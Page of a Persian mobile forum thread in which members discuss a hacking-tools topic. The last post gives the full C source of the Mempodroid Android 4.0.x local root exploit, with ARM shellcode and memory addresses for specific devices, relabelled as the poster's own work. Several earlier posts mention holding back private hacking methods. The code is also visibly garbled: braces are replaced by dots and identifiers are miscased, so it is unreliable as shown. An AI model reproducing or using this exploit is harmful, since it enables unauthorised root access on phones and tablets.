• ورود

    عضويت در سايت موبايلستان ايميل فعال سازي ارسال نشده است ؟ کلمه عبور خود را گم کرده ايد ؟
  • ثبت نام

  • بستن این دسته بندی اطلاعيه ها


    صفحه 2 از 2 نخستنخست 12
    نمایش نتایج: از 11 به 14 از 14

    برنامه‌نویسی

    1. Top | #11



      درجه : عضو نيمه ممتاز
      شماره كاربري : 359173
      نام : آرمان
      نوشته ها: 667
      سپاس ها : 2,557
      سپاس از شما 1,922 بار در 624 پست
      جزئيات بيشتر

      پیش فرض

      دوست عزیز سلام
      ممنون از زحمات شما

      ولی اولا این دلیل نمیشه که اگه کسی بیاد چپ و راست پست بده یعنی استقبال شده ، اتفاقا ما نگاه میکنیم ، تشکر رو میزنیم و اینکه وسط حرف های شما حرف نمیزنیم یعنی احترام گذاشتیم.

      دوما والا ما اصلا نمیدونیم اینا چیه (فحش نوشتی؟ شوخی) که بخوایم در بارش حرف بزنیم.

      اگه هم چیزیه که به درد دولوپر ها میخوره ، اینجا دیگه....... (قضیه چند وقت پیش رو که میدونی؟ ..... نمیشه بگم شرمنده بن میشم)

    2. 3 كاربر زير از شما arman0077 عزيز، سپاسگزاری كرده اند



    3. کسب و کار


    4. Top | #12


      درجه : مدیر بازنشسته
      بخش : اخبار | HTC HD2
      شماره كاربري : 210412
      نام : ایلیا
      نوشته ها: 5,431
      سپاس ها : 16,760
      سپاس از شما 39,084 بار در 5,541 پست
      جزئيات بيشتر

      پیش فرض

      دوست گلم نیازی نیست کسی چیزی بگه تا بن بشه... :)
      در مورد استقبال هم این مطالب برای افراد خاصی هست که احتیاج پیدا کنند. شما تشریف ببرید آرشیو بخش و یا رو خود بخش آموزش ببینید آموزش هایی که دوستان گذاشتنند با اون همه زمانی که برده جند تا سپاس خورده... کسی نمی یاد بگه چقدر سرد بوده استقبال.. من همون روز که شما زحمت اینها رو کشیدی تمام پستهاتون رو اصلاح کردم گرچه اصلا کار خاصی نیست اما این کار رو برای کی انجام میدم؟ چیزی که که از جانب شما برای من جالب بود این مورد بود که شما این مطالب رو نوشتی و حتی ننوشتی لطفا سپاس بزنید.. چیزی که کمتر اتفاق می افته و خوشم اومد از این حالت که واسه دل خودت کار می کنی و به کمک رسان دوستات هستی...

      شما کارت رو اگر دوست داری ادامه بده.. مطمئن باش که حتی اگه یه نفر کار شما رو به درستی بفهمه و چیزی یاد بگیره شما رسالتت رو انجام دادی.

      مشکل بزرگ دنیا این است که دانایان به گفته های خود باور کاملی ندارند در حالی که نادانان سرشار از یقین اند....

      برتنارد راسل



    5. 5 كاربر زير از شما ™EXITMOOD عزيز، سپاسگزاری كرده اند




    6. Top | #13



      درجه : عضو نيمه ممتاز
      شماره كاربري : 627258
      نام : ҤȺСКЕЯ
      نوشته ها: 713
      سپاس ها : 1,327
      سپاس از شما 2,267 بار در 593 پست
      جزئيات بيشتر

      پیش فرض

      حرف شما رو قبول دارم

      اما

      قبل از این توهیچ سایتی در این مورد بحث کامل و تخصصی نشده بود، به همین دلیل من این تایپیک رو باز کردم
      اولش گفتم ابزار هایی که عمومی شده رو بزارم بعد اگه استقبال شد برم سراغ priv8 (به مجموعه روش هایی برای هک که به صورت عمومی عرضه نشده و فقط هکر ها تو زیرزمینشون دارن ازش استفاده میکنند)
      ولی چون بیشتر افراد اهمیت نمیدن من هم دلیلی نمیبینم برای عمومی کردن این روش ها.

      از این به بعد فقط باگ های پابلیک رو جمعاوری میکنم و تو این تایپیک میزارم.

    7. 5 كاربر زير از شما P.E.Y.M.A.N عزيز، سپاسگزاری كرده اند




    8. Top | #14



      درجه : عضو نيمه ممتاز
      شماره كاربري : 627258
      نام : ҤȺСКЕЯ
      نوشته ها: 713
      سپاس ها : 1,327
      سپاس از شما 2,267 بار در 593 پست
      جزئيات بيشتر

      پیش فرض

      لوکال روت برای اندروید 4.0.1
      ( گلکسی نکسوس)

      local root by peyman //
      #include <stdio.h>
      #include <unistd.h>
      #include <stdlib.h>
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <fcntl.h>
      #include <errno.h>
      #include <stdbool.h>

      #define argv0 "xe-jm_uh"

      #define _syscall(expr) (.. \
      __typeof__(expr) _value; \
      for(;;) if ((long) (_value = (expr)) != -1) \
      break; \
      else if (errno != eintr) .. \
      char line[1024]; \
      sprintf(line, "(%u)", __line__); \
      perror(line); \
      exit(1); \
      } \
      _value; \
      })

      #define _assert(test) do .. \
      if (!(test)) .. \
      fprintf(stderr, "_assert(%s)\n", #test); \
      exit(1); \
      } \
      } while (false)

      static int child(int sock) ..
      Char path[32];
      sprintf(path, "/proc/%u/mem", getppid());
      int mem = _syscall(open(path, o_wronly));

      uint8_t data[1] = {0};

      struct iovec iov;
      iov.iov_base = data;
      iov.iov_len = sizeof(data);

      struct msghdr msg;
      memset(&msg, 0, sizeof(msg));
      msg.msg_iov = &iov;
      msg.msg_iovlen = 1;

      char control[cmsg_space(sizeof(int))];
      msg.msg_control = control;
      msg.msg_controllen = sizeof(control);

      struct cmsghdr *cmsg;
      cmsg = cmsg_firsthdr(&msg);
      cmsg->cmsg_len = cmsg_len(sizeof(int));
      cmsg->cmsg_level = sol_socket;
      cmsg->cmsg_type = scm_rights;
      * (int *) cmsg_data(cmsg) = mem;

      _syscall(sendmsg(sock, &msg, 0));
      return 0;
      }

      static int parent(int sock, int argc, char *argv[]) ..
      Uint8_t data[1024];

      struct iovec iov;
      iov.iov_base = data;
      iov.iov_len = sizeof(data);

      struct msghdr msg;
      memset(&msg, 0, sizeof(msg));
      msg.msg_iov = &iov;
      msg.msg_iovlen = 1;

      char control[cmsg_space(sizeof(int))];
      msg.msg_control = control;
      msg.msg_controllen = sizeof(control);

      _syscall(recvmsg(sock, &msg, 0));

      struct cmsghdr *cmsg;
      cmsg = cmsg_firsthdr(&msg);
      _assert(cmsg != null);

      _assert(cmsg->cmsg_len == cmsg_space(sizeof(int)));
      _assert(cmsg->cmsg_level == sol_socket);
      _assert(cmsg->cmsg_type == scm_rights);

      int mem = * (int *) cmsg_data(cmsg);
      _assert(mem != -1);

      --argc; ++argv;

      off_t offset = strtoul(argv[0], null, 0);
      off_t rest = strtoul(argv[1], null, 0);

      argc -= 2;
      argv += 2;

      #ifdef __arm__
      const uint16_t exploit[] = ..
      0xbc73, // pop {r0, r1, r4, r5, r6}
      0x2501, // mov r5, #1
      0x3d01, // sub r5, #1

      // movw r3, *rest
      0xf640 | (rest & 0x0800) >> 1 | (rest & 0xf000) >> 12,
      0x0300 | (rest & 0x0700) << 4 | (rest & 0x00ff),

      0x4718, // bx r3
      0};
      #endif

      offset -= 17;
      lseek(mem, offset, seek_set);

      _assert(memchr(exploit, 0, sizeof(exploit)) == exploit + sizeof(exploit) / sizeof(exploit[0]) - 1);

      int save = dup(2);

      dup2(mem, 2);
      close(mem);

      if (save != 3) ..
      Dup2(save, 3);
      close(save);
      }

      char self[1024];
      _syscall(readlink("/proc/self/exe", self, sizeof(self) - 1));

      char *args[4 + argc + 1];
      args[0] = strdup("run-as");
      args[1] = (char *) exploit;
      args[2] = self;
      args[3] = strdup("-");

      int i;
      for (i = 0; i != argc; ++i)
      args[4 + i] = argv[i];
      args[4 + i] = null;

      _syscall(execv("/system/bin/run-as", args));
      return 0;
      }

      int main(int argc, char *argv[]) ..
      If (argc == 1) ..
      Printf(
      "usage: Mempodroid <exit> <call> <args...>\n"
      " exit: Address in memory to exit function\n"
      " call: Address in memory of setresuid call\n"
      " args: Command to run, including arguments\n"
      "\n"
      /*" note: To attempt autodetect, pass '-'\n"
      " for either exit, call, or both\n");*/
      " acer a200 tablet 4.0.3: 0xd9f0 0xaf47\n"
      " galaxy nexus 4.0.1: 0xd7fe 0xad57\n"
      " galaxy nexus 4.0.2: 0xd7f4 0xad4b\n"
      " motorola razr 4.0.3: 0xd6c4 0xad33\n"
      " nexus s 4.0.2: 0xd7cc 0xad27\n"
      " transformer prime 4.0.3: 0xd9ec 0xaf47\n"
      "\n"
      "concrete implementation by jay freeman (saurik)\n"
      "based on exploit by jason a. Donenfeld (zx2c4)\n"
      "more information at: Http://blog.zx2c4.com/749\n"
      "original kernel exploit reported by jüri aedla\n"
      );

      return 0;
      }

      if (strcmp(argv[1], "-") == 0) ..
      Dup2(3, 2);
      close(3);

      _syscall(execvp(argv[2], argv + 2));
      return 1;
      }

      int pair[2];
      _syscall(socketpair(pf_unix, sock_dgram, 0, pair));

      if (strcmp(argv[0], argv0) == 0)
      return child(strtoul(argv[1], null, 0));

      pid_t pid = fork();
      if (pid != 0) ..
      Close(pair[1]);
      return parent(pair[0], argc, argv);
      }

      close(pair[0]);
      char argv1[16];
      sprintf(argv1, "%u", pair[1]);

      _syscall(execl("/proc/self/exe", argv0, argv1, null));
      return 1;
      }
      [/left]

    9. 3 كاربر زير از شما P.E.Y.M.A.N عزيز، سپاسگزاری كرده اند





    صفحه 2 از 2 نخستنخست 12

       توضیحاتی درباره این موضوع

    مجوز های ارسال و ویرایش

    • شما نمیتوانید موضوع جدیدی ارسال کنید
    • شما امکان ارسال پاسخ را ندارید
    • شما نمیتوانید فایل پیوست کنید.
    • شما نمیتوانید پست های خود را ویرایش کنید
    •